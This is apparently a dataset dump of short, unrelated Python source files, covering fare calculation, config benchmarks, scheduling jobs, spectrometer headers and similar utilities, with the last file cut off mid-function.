id stringlengths 1 265 | text stringlengths 6 5.19M | dataset_id stringclasses 7
values |
|---|---|---|
3352086 | <reponame>kfields/robocute
import sys
from pyglet.window import key
from robocute.mailbox import Mailbox
class Keybox(Mailbox):
    """Mailbox that handles keyboard input events.

    Base class for key handlers; subclasses override on_key_press.
    """
    def __init__(self):
        super().__init__()
    def exit(self):
        # Terminate the whole application.
        sys.exit()
    def on_key_press(self, symbol, modifiers):
        # Default handler ignores all key presses; subclasses override.
        pass
class MultiKeybox(Mailbox):
    """Keybox that fans key-press events out to a collection of child boxes."""
    def __init__(self):
        super().__init__()
        # Fix: `boxes` was read in on_key_press but never initialized, so
        # dispatching before a caller assigned it raised AttributeError.
        self.boxes = []
    def on_key_press(self, symbol, modifiers):
        # Forward the event to every registered child handler.
        for box in self.boxes:
            box.on_key_press(symbol, modifiers)
| StarcoderdataPython |
3373316 | <reponame>waikato-datamining/wai-spectral-io
from enum import Enum
from typing import List
class InstrumentType(Enum):
    """Known spectrometer instrument types, keyed by their on-disk code."""
    SER_4250 = 0
    SER_51A = 1
    SIC_4250 = 2
    SIC_6250 = 3
    SIC_6250V = 4
    PARALLEL_6250 = 5
    PARALLEL_6250V = 6
    BL_500 = 7
    BL_400 = 8
    SIC_6500 = 9
    SIC_5500 = 10
    SIC_5000 = 11
    SIC_4500 = 12
    INFRATEC = 13

    # Alias so `instrument_type.code` reads the same as the file-format code.
    code = property(lambda self: self.value)

    @classmethod
    def from_code(cls, code: int) -> 'InstrumentType':
        """
        Gets an instrument type from its code.

        :param code: The instrument type code.
        :return: The instrument type.
        :raises ValueError: If no instrument type has the given code.
        """
        # Codes are identical to the enum values, so the enum's own O(1)
        # value lookup replaces the previous linear scan over members.
        try:
            return cls(code)
        except ValueError:
            raise ValueError(f"No instrument type with code {code} found") from None
class InstrumentHeader:
    """
    Instrument Header class.

    Mirrors the binary instrument-header record: instrument type code,
    model/serial strings, segment layout, a packed wavelength table and
    constituent names.
    """
    def __init__(self):
        # 2 BYTES: Instrument type
        self.instrument_type: InstrumentType = InstrumentType.SER_4250
        # char[21] model number
        self.model: str = ""
        # char[9] serial number
        self.serial: str = ""
        # 2 BYTES integer, number of segments up to 20 (?)
        self.num_seg: int = 0
        # 40 BYTES int[20], points per segment
        self.points_per_segment: List[int] = []
        # 2 BYTES int spacing mode: 00=TILFIL, 01=EQUALSPC, 02=FILFIL, 03=SIN
        self.spacing_mode: int = 0
        # Packed wavelength table: start float[7], inc float[7], end float[7]
        self.wave: List[float] = []
        # 2 BYTES int, number of EOC's (??) use 4400?
        self.neoc: int = 0
        # 94 bytes of padding
        # 32 * 16 chars, null terminated constituent names
        self.constituents: List[str] = []

    def _wave_block(self, offset: int) -> List[float]:
        # The wave table packs starts, increments and ends in blocks of 7.
        return self.wave[offset:offset + 7]

    @property
    def starts(self) -> List[float]:
        """Segment start wavelengths (first block of the wave table)."""
        return self._wave_block(0)

    @property
    def increments(self) -> List[float]:
        """Segment wavelength increments (second block of the wave table)."""
        return self._wave_block(7)

    @property
    def ends(self) -> List[float]:
        """Segment end wavelengths (third block of the wave table)."""
        return self._wave_block(14)
| StarcoderdataPython |
43923 | <gh_stars>0
from django.urls import path
from rest_framework.authtoken.views import obtain_auth_token
from employee.views import EmployeeCreateView, EmployeeListView, EmployeeUpdateView, login_view, register_view, logout_view
# Namespace used for reversing URLs, e.g. reverse('employee:list').
app_name = 'employee'

urlpatterns = [
    path('e/create', EmployeeCreateView.as_view(), name='test'),
    path('e/list', EmployeeListView.as_view(), name='list'),
    # NOTE(review): duplicate route name 'list' — reverse('employee:list')
    # will resolve to only one of these two patterns; confirm intent.
    path('e/update/<int:pk>', EmployeeUpdateView.as_view(), name='list'),
    # DRF token endpoint: POST username/password, returns an auth token.
    path('e/api/token', obtain_auth_token, name='obtain-token'),
    path('e/login', login_view, name='login'),
    path('e/logout', logout_view, name='logout'),
    path('e/register', register_view, name='register'),
]
3308835 | <gh_stars>0
import pymongo
import os
from socialcar.settings import MONGO_DBNAME
# Zone-to-zone lookup: TABLE_OF_ZONES[from_zone-1][to_zone-1] gives the
# number of fare zones crossed between two city-bus zones (used by
# citybus_ljubljana). Presumably symmetric with 1 on the diagonal —
# TODO confirm against the tariff source.
TABLE_OF_ZONES = [[1,1,3,1,1,2,3,2,2,1],
                  [1,1,2,1,1,2,3,2,2,1],
                  [3,2,1,3,3,3,3,3,3,3],
                  [1,1,3,1,1,2,2,2,2,1],
                  [1,1,3,1,1,2,3,2,2,1],
                  [2,2,3,2,2,1,3,2,2,2],
                  [3,3,3,2,3,3,1,3,3,3],
                  [2,2,3,2,2,2,3,1,2,2],
                  [2,2,3,2,2,2,3,2,1,2],
                  [1,1,3,1,1,2,3,2,2,1]]

# MongoDB connection settings, overridable via environment variables.
MONGO_HOST = os.environ.get('MONGO_HOST', 'localhost')
MONGO_PORT = int(os.environ.get('MONGO_PORT', 27017))
MONGO_USERNAME = os.environ.get('MONGO_USERNAME', '')
MONGO_PASSWORD = os.environ.get('MONGO_PASSWORD', '')
# Collection mapping bus-stop ids to fare-zone ids.
MONGO_ZONE_ID_COLLECTION = 'citybus_zone'
# Field name holding the bus-stop identifier in that collection.
BUS_STOP_ID = 'lpp_id'
#===============================================================================
# rail_fare ()
#===============================================================================
# Distance-banded rail tariffs per city, as
# (upper bounds in km, fares, fare beyond the last bound).
# Each fare applies to distances <= its bound, so a left bisection on the
# bounds selects the matching band. This replaces a ~180-line elif ladder.
_RAIL_TARIFFS = {
    'Brussels': (
        [8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23,
         24, 25, 26, 27, 28, 29, 30, 33, 36, 39, 42, 45, 48, 51, 54, 57,
         60, 65, 70, 75, 80, 85, 90, 95, 100, 105, 110, 115, 120, 125,
         130, 135, 140, 145],
        [2.20, 2.30, 2.40, 2.60, 2.70, 2.80, 3.00, 3.10, 3.20, 3.40,
         3.50, 3.70, 3.80, 3.90, 4.10, 4.20, 4.40, 4.50, 4.60, 4.80,
         4.90, 5.10, 5.20, 5.50, 5.90, 6.30, 6.70, 7.10, 7.60, 8.00,
         8.40, 8.80, 9.20, 9.80, 10.50, 11.20, 11.90, 12.60, 13.30,
         14.00, 14.70, 15.30, 16.00, 16.70, 17.40, 18.10, 18.80, 19.50,
         20.20, 20.90],
        21.90,
    ),
    # Tariff per km as in the .xlsx for Ljubljana (instead of the flat
    # 2.2 EUR City-Rail fare).
    'Ljubljana': (
        [10, 20, 30, 40, 50, 60, 70, 80, 90, 100, 120, 140, 160, 180,
         200, 220, 240, 260, 280, 300, 320, 340, 360, 380, 400, 420,
         440, 460, 480, 500, 525, 550, 575],
        [1.28, 1.85, 2.58, 3.44, 4.28, 5.08, 5.80, 6.59, 6.99, 7.17,
         7.70, 8.49, 9.56, 10.91, 12.02, 12.95, 13.99, 14.77, 15.81,
         16.68, 17.67, 18.58, 19.50, 20.54, 21.59, 22.37, 23.29, 24.34,
         25.24, 26.44, 27.47, 28.67, 30.10],
        31.29,
    ),
}


def rail_fare(distance, name):
    """Rail ticket price for a trip of `distance` meters in the given city.

    :param distance: trip length in meters.
    :param name: city name ('Brussels' or 'Ljubljana').
    :return: fare in EUR, or -1 for cities without a rail tariff.
    """
    from bisect import bisect_left  # stdlib; local import keeps edit self-contained
    if name not in _RAIL_TARIFFS:
        return -1
    # convert meters to kilometers
    distance = float(distance) / 1000
    bounds, fares, max_fare = _RAIL_TARIFFS[name]
    band = bisect_left(bounds, distance)
    return fares[band] if band < len(fares) else max_fare
#===============================================================================
# bus_fare ()
#===============================================================================
def bus_fare(leg, name):
    """Bus ticket price for one journey leg in the given city.

    :param leg: dict describing the leg; reads leg['transport']['agency_id'],
        leg['distance'] and leg['route']['points'][i]['stop_id'] — assumes
        this schema, TODO confirm against the journey-planner payload.
    :param name: city name.
    :return: fare in EUR, or -1 for unsupported cities.
    """
    if name == 'Brussels':
        # If provider is TEC
        if leg['transport']['agency_id'] == 'TEC':
            return 3.50
        # If provider is De Lijn
        else:
            return 3.00
    elif name == 'Ljubljana':
        # from 'agency_id' find type of bus (citybus or intercity), e.g for citybus:'lpp_2197', intercity: '2206108040402'
        if leg['transport']['agency_id'] == 'lpp':
            # City bus: fare depends on zones crossed between first and last stop.
            return citybus_ljubljana(leg['route']['points'][0]['stop_id'], leg['route']['points'][-1]['stop_id'], leg['distance'])
        else:
            # Intercity bus: fare depends on distance only.
            return bus_intercity_ljubljana(leg['distance'])
    # NOTE(review): '<NAME>' is dataset-anonymization residue — the original
    # city name was lost; this branch can never match as written.
    elif name == '<NAME>':
        return 2.20 # ??how to calculate fare for 13 zones??
    else:
        return -1
#===============================================================================
# citybus_ljubljana ()
#===============================================================================
def citybus_ljubljana(start_id, end_id, distance):
    """Ljubljana city-bus fare based on fare zones crossed.

    Looks up the fare zone of the first and last stop in MongoDB, then
    maps the zone pair to a zone count via TABLE_OF_ZONES.

    :param start_id: stop id of the boarding stop (BUS_STOP_ID field value).
    :param end_id: stop id of the alighting stop.
    :param distance: leg distance in meters (used for the intercity fallback).
    :return: fare in EUR.
    """
    # have a collection in db with stop_id, zone_id to find the zone each bus stop belongs to (e.g db collection citybus_zone)
    # NOTE(review): a new Mongo client is opened on every call and never
    # closed — consider reusing a module-level client.
    client = pymongo.MongoClient(MONGO_HOST, MONGO_PORT)
    db = client[MONGO_DBNAME]
    collection = db[MONGO_ZONE_ID_COLLECTION] # name of collection in db for stop_id --> zone_id mapping
    # find zone_id for first and last bus stops
    # (assumes both stops exist in the collection; find_one returning None
    # would raise TypeError below — TODO confirm)
    start = collection.find_one({BUS_STOP_ID: start_id})
    end = collection.find_one({BUS_STOP_ID: end_id})
    # from TABLE_OF_ZONES find the number of zones crossed
    if start['zone_id'] == 0 or end['zone_id'] == 0:
        # if 'zone_id' == 0 use intercity bus fare
        return bus_intercity_ljubljana(distance)
    else:
        # zone ids are 1-based; the table is 0-indexed.
        number_of_zones = TABLE_OF_ZONES[start['zone_id']-1][end['zone_id']-1]
        if number_of_zones == 1:
            return 1.20
        elif number_of_zones == 2:
            return 1.60
        else:
            return 2.50
#===============================================================================
# bus_intercity_ljubljana ()
#===============================================================================
# Intercity bus tariff bands: fare i applies to distances <= _INTERCITY_BOUNDS[i]
# km; anything beyond the last bound costs the flat maximum below.
# Table-driven replacement for a ~100-line elif ladder.
_INTERCITY_BOUNDS = [5, 10, 15, 20, 25, 30, 35, 40, 45, 50, 55, 60, 65, 70,
                     75, 80, 85, 90, 95, 100, 105, 110, 115, 120, 125, 130,
                     135, 140, 145, 150, 160, 170, 180, 190, 200, 210, 220,
                     230, 240, 250, 260, 270, 280, 290, 300, 310, 320, 330,
                     340, 350, 360]
_INTERCITY_FARES = [1.30, 1.80, 2.30, 2.70, 3.10, 3.60, 4.10, 4.70, 5.20,
                    5.60, 6.00, 6.30, 6.70, 6.90, 7.20, 7.50, 7.90, 8.30,
                    8.70, 9.20, 9.60, 9.90, 10.30, 10.70, 11.10, 11.40,
                    11.60, 12.00, 12.40, 12.80, 13.60, 14.40, 15.20, 16.00,
                    16.80, 17.60, 18.40, 19.20, 20.00, 20.80, 21.60, 22.40,
                    23.20, 24.00, 24.80, 25.60, 26.40, 27.20, 28.00, 28.80,
                    29.60]
_INTERCITY_MAX_FARE = 30.40


def bus_intercity_ljubljana(distance):
    """Ljubljana intercity bus fare for a trip of `distance` meters.

    :param distance: trip length in meters.
    :return: fare in EUR.
    """
    from bisect import bisect_left  # stdlib; local import keeps edit self-contained
    # convert meters to kilometers
    distance = float(distance) / 1000
    band = bisect_left(_INTERCITY_BOUNDS, distance)
    return _INTERCITY_FARES[band] if band < len(_INTERCITY_FARES) else _INTERCITY_MAX_FARE
#===============================================================================
# metro_fare ()
#===============================================================================
def metro_fare(name):
    """Flat metro ticket price for the given city; -1 if no metro tariff."""
    # Brussels is the only city with a metro tariff in scope.
    return 2.10 if name == 'Brussels' else -1
#===============================================================================
# tram_fare ()
#===============================================================================
def tram_fare(site, distance):
    """Tram fare placeholder: no tram tariff is defined for any city yet."""
    # Always signals "unsupported", mirroring the other *_fare fallbacks.
    return -1
#===============================================================================
# carpooling_fare ()
#===============================================================================
def carpooling_fare(distance, name):
    """Carpooling cost for a trip of `distance` meters in the given city.

    Below the city's distance limit a single per-distance rate applies;
    beyond it, the remainder is charged at a cheaper long-haul rate.
    Returns -1 for cities without a carpooling tariff.
    """
    # Per-city tariff: (limit, rate up to limit, rate beyond limit).
    # Edinburgh's tariff is expressed per mile, the others per km.
    tariffs = {
        'Edinburgh': (30, 0.15, 0.07),
        'Brussels': (100, 0.08, 0.04),
    }
    if name not in tariffs:
        return -1
    # convert meters to kilometers
    distance = float(distance) / 1000
    if name == 'Edinburgh':
        # convert kms to miles
        distance = distance * 0.621
    limit, near_rate, far_rate = tariffs[name]
    if distance <= limit:
        return near_rate * distance
    return (near_rate * limit) + (distance - limit) * far_rate
| StarcoderdataPython |
3307442 | import fasttext
from collections import Counter
from project.server.main.bso_category import get_bso_category
from project.server.main.pf_classifier import get_pf_label
from project.server.main.utils import download_file
import pickle
import os
os.system("mkdir -p /src/models/")
if os.path.exists("/src/models/all_categ_revue.pkl") is False:
download_file("https://storage.gra.cloud.ovh.net/v1/AUTH_32c5d10cb0fe4519b957064a111717e3/models/all_categ_revue.pkl", "/src/models/all_categ_revue.pkl")
all_categ_revue = pickle.load(open('/src/models/all_categ_revue.pkl', 'rb'))
def get_categ_from_source(source, top=1):
    """Return the `top` most common usable categories for a journal.

    Categories come from the module-level `all_categ_revue` mapping
    (journal name -> iterable of categories); results are joined with ';'.
    Returns 'unknown' when the journal is absent or has no usable category.

    :param source: journal name to look up.
    :param top: number of categories to return.
    """
    try:
        categ_counts = Counter(all_categ_revue[source]).most_common()
    except KeyError:
        # Fix: the original bare `except:` swallowed every error (even
        # programming bugs); only a missing journal is an expected miss.
        return 'unknown'
    # Drop empty/placeholder categories, preserving most-common order.
    ranked = [categ for categ, _ in categ_counts
              if categ and categ not in ('unknown', '')]
    ans = ";".join(ranked[:top])
    return ans if ans else 'unknown'
def get_discipline_calc(title, journal_name, details = False):
    """Compute the BSO discipline classification for one publication.

    Strategy, in order: (1) confident title-based classifier, (2) fallback
    to the journal's dominant category, (3) lenient title-based classifier
    over the top-10 predicted tags.

    :param title: publication title (may be empty/None).
    :param journal_name: journal the publication appeared in.
    :param details: when True, include method and tag diagnostics.
    :return: dict with at least 'bso_classification'.
    """
    current_field = "unknown"
    method = ""
    pf_tags = []
    # Top-3 journal categories, kept only for the diagnostics output.
    top_categ = get_categ_from_source(journal_name, 3)
    if isinstance(title, str) and len(title)>0:
        # Pass 1: strict classification from the title tags.
        prediction_pf = get_pf_label(title)
        current_field = get_bso_category(prediction_pf)
        method = "pf_classifier_confident"
        pf_tags = prediction_pf
    if current_field == "unknown":
        # Pass 2: fall back to the journal's single dominant category.
        current_field = get_categ_from_source(journal_name)
        method = "category_from_journal"
    if current_field == 'unknown' and isinstance(title, str) and len(title)>0:
        # Pass 3: lenient match over a wider tag set.
        prediction_pf_2 = get_pf_label(title, nb_top = 10)
        current_field = get_bso_category(prediction_pf_2, is_strict=False)
        method = "pf_classifier_lenient"
        pf_tags = prediction_pf_2
    ans = { "bso_classification": current_field }
    if details:
        ans.update( {
            "bso_classification_method": method,
            "bso_classification_pf_tags": pf_tags,
            "bso_classification_journal_top_categ": top_categ
            } )
    return ans
def bso_classify(elems, details = False):
    """Attach BSO classification fields to each element of `elems` in place.

    :param elems: list of dicts describing publications.
    :param details: forwarded to get_discipline_calc for diagnostics.
    :return: the same list with classification fields merged in.
    """
    for e in elems:
        # NOTE(review): `and` binds tighter than `or`, so this condition is
        # ('doi' in e and 'title' not in e) or ('journal_name' not in e).
        # The intent was likely 'doi' in e and ('title' not in e or
        # 'journal_name' not in e) — confirm before changing.
        if 'doi' in e and 'title' not in e or 'journal_name' not in e:
            #e = enrich_metadata(e)
            continue
        if 'title' in e and 'journal_name' in e:
            calc = get_discipline_calc(e['title'], e['journal_name'], details)
            e.update(calc)
    return elems
| StarcoderdataPython |
134797 |
from ..tre_elements import TREExtension, TREElement
__classification__ = "UNCLASSIFIED"
__author__ = "<NAME>"
class PT(TREElement):
    """A single lon/lat point record (two 15-char string fields)."""
    def __init__(self, value):
        super(PT, self).__init__()
        self.add_field('LON', 's', 15, value)
        self.add_field('LAT', 's', 15, value)
class ACVT(TREElement):
    """One accuracy record: optional absolute/point accuracy plus a point list."""
    def __init__(self, value):
        super(ACVT, self).__init__()
        # Conditional fields: AAV/APV are only present when their unit
        # fields are non-empty. Assumes add_field also sets the parsed
        # value as an attribute (self.UNIAAV etc.) — TODO confirm in
        # TREElement.
        self.add_field('UNIAAV', 's', 3, value)
        if self.UNIAAV != '':
            self.add_field('AAV', 's', 5, value)
        self.add_field('UNIAPV', 's', 3, value)
        if self.UNIAPV != '':
            self.add_field('APV', 's', 5, value)
        self.add_field('NUMPTS', 'd', 3, value)
        # NUMPTS repetitions of the PT (lon/lat) record.
        self.add_loop('PTs', self.NUMPTS, PT, value)
class ACCVTBType(TREElement):
    """Payload of the ACCVTB TRE: a count followed by that many ACVT records."""
    def __init__(self, value):
        super(ACCVTBType, self).__init__()
        self.add_field('NUMACVT', 'd', 2, value)
        self.add_loop('ACVTs', self.NUMACVT, ACVT, value)
class ACCVTB(TREExtension):
    """Registration of the ACCVTB tagged record extension."""
    _tag_value = 'ACCVTB'
    _data_type = ACCVTBType
| StarcoderdataPython |
1776337 | import copy
from typing import Any, Dict, List
from pytest import lazy_fixture # type: ignore
from pytest import fixture, mark, param
from omegaconf import OmegaConf
from omegaconf._utils import ValueKind, _is_missing_literal, get_value_kind
def build_dict(
    d: Dict[str, Any], depth: int, width: int, leaf_value: Any = 1
) -> Dict[str, Any]:
    """Populate `d` as a nested dict tree and return it.

    Every internal level has `width` children named key_0..key_{width-1};
    at `depth` 0 each key maps directly to `leaf_value`.
    """
    for i in range(width):
        key = f"key_{i}"
        if depth == 0:
            d[key] = leaf_value
        else:
            d[key] = build_dict({}, depth - 1, width, leaf_value)
    return d
def build_list(length: int, val: Any = 1) -> List[int]:
    """Return a list containing `val` repeated `length` times."""
    return [val for _ in range(length)]
# Module-scoped fixtures: each structure is built once per test module so
# the benchmarks measure OmegaConf operations, not fixture construction.
@fixture(scope="module")
def large_dict() -> Any:
    # 2^12-leaf nested dict (depth 11, width 2).
    return build_dict({}, 11, 2)


@fixture(scope="module")
def small_dict() -> Any:
    return build_dict({}, 5, 2)


@fixture(scope="module")
def dict_with_list_leaf() -> Any:
    return build_dict({}, 5, 2, leaf_value=[1, 2])


@fixture(scope="module")
def small_dict_config(small_dict: Any) -> Any:
    return OmegaConf.create(small_dict)


@fixture(scope="module")
def dict_config_with_list_leaf(dict_with_list_leaf: Any) -> Any:
    return OmegaConf.create(dict_with_list_leaf)


@fixture(scope="module")
def large_dict_config(large_dict: Any) -> Any:
    return OmegaConf.create(large_dict)


@fixture(scope="module")
def merge_data(small_dict: Any) -> Any:
    # Five identical configs to feed the merge benchmarks.
    return [OmegaConf.create(small_dict) for _ in range(5)]


@fixture(scope="module")
def small_list() -> Any:
    return build_list(3, 1)


@fixture(scope="module")
def small_listconfig(small_list: Any) -> Any:
    return OmegaConf.create(small_list)
@mark.parametrize(
    "data",
    [
        lazy_fixture("small_dict"),
        lazy_fixture("large_dict"),
        lazy_fixture("small_dict_config"),
        lazy_fixture("large_dict_config"),
        lazy_fixture("dict_config_with_list_leaf"),
    ],
)
def test_omegaconf_create(data: Any, benchmark: Any) -> None:
    # Benchmark config construction from plain dicts and existing configs.
    benchmark(OmegaConf.create, data)


@mark.parametrize(
    "merge_function",
    [
        param(OmegaConf.merge, id="merge"),
        param(OmegaConf.unsafe_merge, id="unsafe_merge"),
    ],
)
def test_omegaconf_merge(merge_function: Any, merge_data: Any, benchmark: Any) -> None:
    # Compare the validating merge against the unsafe (no-copy) variant.
    benchmark(merge_function, merge_data)


@mark.parametrize(
    "lst",
    [
        lazy_fixture("small_list"),
        lazy_fixture("small_listconfig"),
    ],
)
def test_list_in(lst: List[Any], benchmark: Any) -> None:
    # Membership test on a plain list vs. a ListConfig (value 10 is absent,
    # forcing a full scan).
    benchmark(lambda seq, val: val in seq, lst, 10)


@mark.parametrize(
    "lst",
    [
        lazy_fixture("small_list"),
        lazy_fixture("small_listconfig"),
    ],
)
def test_list_iter(lst: List[Any], benchmark: Any) -> None:
    # Iteration overhead on a plain list vs. a ListConfig.
    def iterate(seq: Any) -> None:
        for _ in seq:
            pass

    benchmark(iterate, lst)


@mark.parametrize(
    "strict_interpolation_validation",
    [True, False],
)
@mark.parametrize(
    ("value", "expected"),
    [
        ("simple", ValueKind.VALUE),
        ("${a}", ValueKind.INTERPOLATION),
        ("${a:b,c,d}", ValueKind.INTERPOLATION),
        ("${${b}}", ValueKind.INTERPOLATION),
        ("${a:${b}}", ValueKind.INTERPOLATION),
        ("${long_string1xxx}_${long_string2xxx:${key}}", ValueKind.INTERPOLATION),
        (
            "${a[1].a[1].a[1].a[1].a[1].a[1].a[1].a[1].a[1].a[1].a[1]}",
            ValueKind.INTERPOLATION,
        ),
    ],
)
def test_get_value_kind(
    strict_interpolation_validation: bool, value: Any, expected: Any, benchmark: Any
) -> None:
    # Benchmarks interpolation-grammar classification; also asserts the
    # classification result so the benchmark doubles as a correctness check.
    assert benchmark(get_value_kind, value, strict_interpolation_validation) == expected


def test_is_missing_literal(benchmark: Any) -> None:
    # "???" is OmegaConf's mandatory-value marker.
    assert benchmark(_is_missing_literal, "???")


@mark.parametrize("force_add", [False, True])
# NOTE(review): "a.<KEY>" looks like dataset-anonymization residue; the
# original deep key path was lost.
@mark.parametrize("key", ["a", "a.<KEY>"])
def test_update_force_add(
    large_dict_config: Any, key: str, force_add: bool, benchmark: Any
) -> None:
    cfg = copy.deepcopy(large_dict_config)  # this test modifies the config
    if force_add:
        OmegaConf.set_struct(cfg, True)

    def recursive_is_struct(node: Any) -> None:
        # Touch the struct flag on every node to warm caches before timing.
        if OmegaConf.is_config(node):
            OmegaConf.is_struct(node)
            for val in node.values():
                recursive_is_struct(val)

    recursive_is_struct(cfg)

    benchmark(OmegaConf.update, cfg, key, 10, force_add=force_add)
| StarcoderdataPython |
3367092 | <filename>src/robobase/converters.py
import math
import numpy as np
def rotate_matrix_to_axis_and_angle(r):
    """Convert a 3x3 rotation matrix to axis-angle form.

    :param r: 3x3 rotation matrix (numpy array or nested sequence).
    :return: tuple (theta, axis, alt_axis). `theta` is the rotation angle in
        radians; `axis` is a numpy unit vector. For theta == 0 the axis is
        undefined and (theta, array([None, None, None]), None) is returned.
        For theta == pi both +axis and -axis describe the same rotation, so
        alt_axis carries the negated axis; otherwise alt_axis is None.
    """
    # Fix: clamp the cosine into [-1, 1]. Floating-point noise in a
    # near-identity or near-180-degree matrix can push (trace - 1)/2
    # slightly outside acos's domain and raise ValueError.
    cos_theta = (np.trace(r) - 1) / 2
    theta = math.acos(max(-1.0, min(1.0, cos_theta)))
    if round(theta, 5) == 0:
        # No rotation: every axis is a fixed axis, so none is reported.
        return theta, np.array([None, None, None]), None
    if math.pi - 0.001 <= round(theta, 5) <= math.pi + 0.001:
        # theta == pi: sin(theta) == 0, so the generic formula below would
        # divide by zero; recover the axis from the diagonal instead.
        wx = math.sqrt((r[0][0] + 1) / 2)
        wy = math.sqrt((r[1][1] + 1) / 2) if wx == 0 else r[0][1] / (2 * wx)
        if wx != 0:
            wz = r[0][2] / (2 * wx)
        elif wy != 0:
            wz = r[1][2] / (2 * wy)
        else:
            wz = math.sqrt((r[2][2] + 1) / 2)
        w = np.array([wx, wy, wz])
        return theta, w, -1 * w
    # Generic case: the axis comes from the skew-symmetric part of r.
    w = np.array([r[2][1] - r[1][2],
                  r[0][2] - r[2][0],
                  r[1][0] - r[0][1]])
    w = w / (2 * math.sin(theta))
    return theta, w, None
| StarcoderdataPython |
3378338 | <gh_stars>0
import time
from typing import Callable, Optional, Tuple
from .states import *
class Job:
    """
    Generic job for the scheduler.

    Jobs that can be scheduled in the scheduler-kernel to run at a particular time and a given number of times.
    This is done calling schedule() and unschedule() and setting the parameters for process, args, interval,
    and times.
    """

    def __init__(
        self,
        process: Optional[Callable] = None,
        args: Optional[Tuple] = (),
        interval: float = 1.0,
        times: Optional[int] = None,
        job_name: Optional[str] = None,
        run_main: bool = False,
        conditional: Callable = None,
    ):
        # process: callable executed on each run; args: its positional args.
        # interval: seconds between runs; times: run count (None = forever).
        # run_main: presumably whether the job must run on the main thread
        #   — scheduled elsewhere, TODO confirm in the scheduler kernel.
        # conditional: optional predicate gating execution (see `scheduled`).
        self.job_name = job_name
        self.state = STATE_INITIALIZE
        self.run_main = run_main
        self.conditional = conditional
        self.process = process
        self.args = args
        self.interval = interval
        self.times = times
        # Bookkeeping: last run timestamp, next due timestamp, runs left.
        self._last_run = None
        self._next_run = time.time() + self.interval
        self._remaining = self.times

    def __call__(self, *args, **kwargs):
        # Invoke the wrapped process directly (bypasses scheduling).
        self.process(*args, **kwargs)

    def __str__(self):
        if self.job_name is not None:
            return self.job_name
        else:
            # Fall back to the process's function name; plain objects
            # (no __name__) fall back to the default repr.
            try:
                return self.process.__name__
            except AttributeError:
                return object.__str__(self)

    @property
    def scheduled(self) -> bool:
        # Due when the next-run time has passed and the optional
        # conditional (if any) allows it. NOTE(review): `_remaining` is
        # not checked here — presumably the kernel enforces run counts.
        return (
            self._next_run is not None
            and time.time() >= self._next_run
            and (self.conditional is None or self.conditional())
        )

    def reset(self) -> None:
        # Restore the job to a freshly-scheduled state.
        self._last_run = None
        self._next_run = time.time() + self.interval
        self._remaining = self.times

    def cancel(self) -> None:
        # Sentinel -1 marks the job as cancelled for the scheduler.
        self._remaining = -1
class ConsoleFunction(Job):
    """
    Special type of Job that runs the Console command provided when the job is executed.
    """

    def __init__(
        self,
        context: "Context",
        data: str,
        interval: float = 1.0,
        times: Optional[int] = None,
        job_name: Optional[str] = None,
        run_main: bool = False,
        conditional: Callable = None,
    ):
        # The job's process is this object itself: calling it feeds `data`
        # to the context's console.
        Job.__init__(
            self, self.__call__, None, interval, times, job_name, run_main, conditional
        )
        self.context = context
        self.data = data

    def __call__(self, *args, **kwargs):
        # Execute the stored console command; extra args are ignored.
        self.context.console(self.data)

    def __str__(self):
        # One-line representation: the command without embedded newlines.
        return self.data.replace("\n", "")
| StarcoderdataPython |
def digit_sum(number_text):
    """Sum of the decimal digits of the given numeric string."""
    return sum(int(ch) for ch in number_text)


def main():
    # Rewrite of a broken Python-2 script: the original used raw_input and
    # `print v`, looped on `len(a)` of an int (TypeError) and called the
    # string as `q(a)` — it could never run. Intent (accumulating digit
    # values into `v`) is preserved as a digit sum.
    q = str(input("give the number...\n"))
    print("0")
    print(digit_sum(q))


if __name__ == "__main__":
    main()
1610170 | """
test_correct_year
~~~~~~~~~~~~~~~~~
Test copyright year adjustment
:copyright: Copyright 2007-2021 by the Sphinx team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import pytest
@pytest.fixture(
    params=[
        # test with SOURCE_DATE_EPOCH unset: no modification
        (None, '2006-2009'),
        # test with SOURCE_DATE_EPOCH set: copyright year should be updated
        # (1293840000 == 2011-01-01 00:00 UTC; one second earlier is 2010)
        ('1293840000', '2006-2011'),
        ('1293839999', '2006-2010'),
    ],
)
def expect_date(request, monkeypatch):
    """Set/unset SOURCE_DATE_EPOCH and yield the expected copyright range."""
    sde, expect = request.param
    if sde:
        monkeypatch.setenv('SOURCE_DATE_EPOCH', sde)
    else:
        monkeypatch.delenv('SOURCE_DATE_EPOCH', raising=False)
    yield expect
@pytest.mark.sphinx('html', testroot='correct-year')
def test_correct_year(expect_date, app):
    """Built HTML must contain the copyright range implied by SOURCE_DATE_EPOCH."""
    app.build()
    content = (app.outdir / 'index.html').read_text()
    assert expect_date in content
| StarcoderdataPython |
3375996 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
def colorize(text, color):
    """Wrap `text` in the ANSI escape sequence for the named color/effect.

    :raises KeyError: if `color` is not a known name.
    """
    # SGR codes: 30-37 select foreground colors; 1/4/5/6 are text effects.
    codes = {
        "black": 30, "red": 31, "green": 32, "yellow": 33,
        "blue": 34, "purple": 35, "cyan": 36, "white": 37,
        "bold": 1, "underline": 4, "blink": 5, "inverse": 6,
    }
    return f"\033[0;0;{codes[color]}m{text}\033[0m"
def levenshtein(word1, word2, distance):
    """Placeholder for a Levenshtein edit-distance routine (not implemented).

    Currently returns None for any input. The intended meaning of the
    `distance` parameter (result accumulator vs. maximum threshold) is not
    clear from this file — TODO confirm before implementing.
    """
    pass
| StarcoderdataPython |
1622823 | <reponame>ladsantos/Eureka
import numpy as np
import scipy.interpolate as spi
from scipy.constants import arcsec
from astropy.io import fits
def dn2electrons(data, meta):
    """
    Convert the subarray data, uncertainty, and variance arrays from raw
    units (DN) to electrons, in place, using the JWST gain reference file.

    Parameters:
    -----------
    data:   object
        Container read/written here: uses `mhdr` (JWST master header) and
        scales `subdata`, `suberr` by the gain and `subv0` by gain**2.
        Assumes the sub* arrays were already trimmed to meta.ywindow /
        meta.xwindow — TODO confirm against the calling pipeline.
    meta:   object
        Provides `gainfile` (absolute path of the R_GAIN reference file)
        and the `xwindow`/`ywindow` subarray bounds.

    Return:
    -------
    The same `data` object with arrays in electrons.

    Notes:
    ------
    The gain files can be downloaded from CRDS (https://jwst-crds.stsci.edu/browse_db/)

    Modification History:
    ---------------------
    Written by <NAME> Jun 2021
    """
    # Subarray parameters from the master header.
    # NOTE(review): SUBSTRT* are used directly as 0-based slice offsets;
    # FITS keywords are conventionally 1-indexed — confirm.
    xstart = data.mhdr['SUBSTRT1']
